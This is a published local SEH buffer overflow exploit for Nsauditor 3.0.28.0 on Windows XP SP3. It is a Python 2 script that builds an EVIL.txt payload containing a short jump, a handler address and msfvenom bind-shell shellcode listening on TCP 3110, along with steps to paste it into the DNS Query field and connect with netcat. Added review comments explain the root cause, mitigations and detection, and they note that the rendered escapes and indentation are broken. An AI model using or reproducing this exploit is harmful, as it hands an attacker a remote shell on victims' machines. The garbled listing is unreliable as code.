# Exploit Title: Nsauditor Local SEH Buffer Overflow
# Date: 15-12-2018
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Exploit Author: Achilles
# Tested Version: 3.0.28.0
# Tested on: Windows XP SP3


# 1.- Run python code : Nsauditor.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Nsauditor
# 4.- In the Window select 'Tools' > 'Dns Lookup'
# 5.- Paste the content of EVIL.txt into the Field: 'Dns Query'
# 6.- Click 'Resolve'
# 7.- Connect with Netcat on port 3110

#!/usr/bin/python

# Proof-of-concept generator: concatenates a filler run, two 4-byte records,
# a short pad and an encoded blob, then writes the result to EVIL.txt.
# Per the header, the author tested against Nsauditor 3.0.28.0 on Windows XP SP3;
# nothing here shows behaviour on other versions or OS releases.
#
# NOTE(review): root cause, as far as the steps above show, is that the
# 'Dns Query' field accepts input far longer than any valid query. A DNS name
# is at most 253 characters, so length validation at the input boundary would
# reject a value of this size before it reaches the vulnerable copy.
#
# NOTE(review): as rendered on this page the string literals contain no escape
# sequences (each "x41" is three text characters), so the listing is not a
# byte-faithful copy of the author's file; read it for layout only.

# Filler repeated 5235 times; presumably the distance to the overwritten
# exception record on the tested build -- TODO confirm, not derivable from here.
buffer = "x41" * 5235
# Four-byte value placed where the "next handler" pointer sits (author: short jump).
NSEH = "xebx06x90x90" #jmp short 6
# Four-byte value placed where the handler pointer sits. The author attributes
# it to nsnetutils.dll, i.e. a module shipped with the product.
# NOTE(review): this class of overwrite depends on a handler address being
# accepted from a module without SafeSEH and on the OS lacking SEHOP; building
# the product's modules with /SAFESEH, /DYNAMICBASE and /NXCOMPAT and running
# on an OS with SEHOP enabled are the relevant mitigations.
SEH = "x30xFFxE6x01" #nsnetutils.dll
# Twenty-byte pad between the handler record and the encoded blob.
nops = "x90" * 20

# Author's list of byte values the input field does not pass through intact.
#badchar x00x0ax0dx2e
# Author's note: blob generated with msfvenom, opens a listener on TCP 3110.
# NOTE(review): for detection, an Nsauditor process that starts listening on
# TCP 3110 (or any port) right after a DNS lookup is the observable to alert on.
#msfvenom Bind port 3110
buf = ""
buf += "xd9xc7xb8x8exe7x77xf1xd9x74x24xf4x5bx29"
buf += "xc9xb1x53x83xebxfcx31x43x13x03xcdxf4x95"
buf += "x04x2dx12xdbxe7xcdxe3xbcx6ex28xd2xfcx15"
buf += "x39x45xcdx5ex6fx6axa6x33x9bxf9xcax9bxac"
buf += "x4ax60xfax83x4bxd9x3ex82xcfx20x13x64xf1"
buf += "xeax66x65x36x16x8ax37xefx5cx39xa7x84x29"
buf += "x82x4cxd6xbcx82xb1xafxbfxa3x64xbbx99x63"
buf += "x87x68x92x2dx9fx6dx9fxe4x14x45x6bxf7xfc"
buf += "x97x94x54xc1x17x67xa4x06x9fx98xd3x7exe3"
buf += "x25xe4x45x99xf1x61x5dx39x71xd1xb9xbbx56"
buf += "x84x4axb7x13xc2x14xd4xa2x07x2fxe0x2fxa6"
buf += "xffx60x6bx8dxdbx29x2fxacx7ax94x9exd1x9c"
buf += "x77x7ex74xd7x9ax6bx05xbaxf2x58x24x44x03"
buf += "xf7x3fx37x31x58x94xdfx79x11x32x18x7dx08"
buf += "x82xb6x80xb3xf3x9fx46xe7xa3xb7x6fx88x2f"
buf += "x47x8fx5dxc5x4fx36x0exf8xb2x88xfexbcx1c"
buf += "x61x15x33x43x91x16x99xecx3axebx22x1ex9d"
buf += "x62xc4x74xf1x22x5exe0x33x11x57x97x4cx73"
buf += "xcfx3fx04x95xc8x40x95xb3x7exd6x1exd0xba"
buf += "xc7x20xfdxeax90xb7x8bx7axd3x26x8bx56x83"
buf += "xcbx1ex3dx53x85x02xeax04xc2xf5xe3xc0xfe"
buf += "xacx5dxf6x02x28xa5xb2xd8x89x28x3bxacxb6"
buf += "x0ex2bx68x36x0bx1fx24x61xc5xc9x82xdbxa7"
buf += "xa3x5cxb7x61x23x18xfbxb1x35x25xd6x47xd9"
buf += "x94x8fx11xe6x19x58x96x9fx47xf8x59x4axcc"
buf += "x08x10xd6x65x81xfdx83x37xccxfdx7ex7bxe9"
buf += "x7dx8ax04x0ex9dxffx01x4ax19xecx7bxc3xcc"
buf += "x12x2fxe4xc4"

# Final layout, in order: filler, next-handler record, handler record, pad, blob.
payload = buffer + NSEH + SEH + nops + buf
# Write the assembled string to EVIL.txt in the current directory.
# NOTE(review): the statements below presumably sat indented under try:/except:
# in the author's file; the indentation is missing on this page. The code uses
# Python 2 print statements.
try:
f=open("EVIL.txt","w")
# Reports the payload length before writing.
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
# Bare except: every failure (not only I/O errors) is reduced to one generic
# message, and the file handle is not closed if the write raises.
except:
print "File cannot be created"